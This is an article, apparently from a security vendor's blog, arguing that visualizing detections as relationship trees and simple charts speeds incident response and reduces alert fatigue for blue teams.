Visibility is always a priority, but it’s vital when responding to an incident. Time is always working against incident responders. Looking through rows of text data and making connections between them and the suspicious activity under investigation is time spent not remediating the problem, which is a real waste when you’re under pressure to stop an attack.
So, why is visualizing detections crucial for incident response? Blue teams, especially those in larger companies, are being hammered with security alerts all day. Anything that helps lessen that considerable load helps direct resources towards better productivity and reduce alert fatigue and burnout.
Taking data and presenting it in a way that is natural and intuitive for humans will reduce response times and spur action when an anomaly is detected. Additionally, it will reduce fatigue, which is common for IR teams that are responding to detections (sometimes in 10–12-hour shifts, with decreasing attention levels as the day progresses). Finally, having a visual of the detection will help facilitate communication across teams, some of whom are not accustomed to getting meaningful information from large data streams.
Understand relationships between your data points Consider a set of unique data points. By understanding the relationships between pairs of these data points, we can automate the construction of a relationship tree between all of them. This will infer relationships between points with many degrees of separation. When it comes to cybersecurity, the points might be events (processes, event logs, or detections), and the relationships between the data points may be causation. Based on our domain knowledge, if we can reason which event is likely to have caused other event(s), we can create our tree based on these relationships. This stops an analyst from having to infer these causations manually, which expedites the following: Understanding the full scope of the attacker’s activity Tracing the tree all the way back to the likely root cause
After determining our data points’ relationships, we must visualize them. Thanks to millions of years of evolution, the human brain is brilliantly designed to find patterns and relationships between objects. It measures characteristics like shape, color, and size before we are even consciously aware of what we are perceiving. In the words of the psychologist Daniel Kahneman, this is the behavior of the “reptilian brain” – the part of the human brain that processes its environment instinctively.
Defenders can exploit this part of the brain to their advantage. For example, bringing this back to security events, we can:
In short, we can present our data in a way that allows the reptilian brain to do its thing.
Once this groundwork has been done, we can call in the neocortex (the rational, conscious part of the brain) to audit these findings and work out what best to do with the information.
Depending on the data type, the relationships between the data points may not be clear. Or the relationships might be, but the idea of representing these as a visualization might not be obvious. Bloodhound is a good example of a solution for this problem: it shows relationships between data points that could not be intuitively perceived or visualized.
We only know whether relationship visualization will work by experimentation. Experimentation requires having a working knowledge of your dataset, generating hypotheses about the relationships within, and testing them. There will undoubtedly be “failed” experiments (hypotheses that seemed sound but failed to produce useful visualizations). Still, in the process of experimentation, you will have gained a deeper understanding of your dataset. This understanding is crucial for effective analysis and will help you when generating future hypotheses.
Our society is currently experiencing a renaissance in artificial intelligence and machine learning. As a result, we are often made to believe that “more complex is better.” There are numerous examples where this is true (the human brain is arguably the most complex known object in the universe), but this belief can make us overlook simple ways for solving a problem elegantly.
Creating a tree with data points of varying visual properties is an effectively simple idea for relationship analysis. Pie charts and scatter plots can be just as effective for statistical analysis, and sometimes a Venn diagram can be all you need for similarity analysis. There are countless visualization methods that can efficiently communicate information.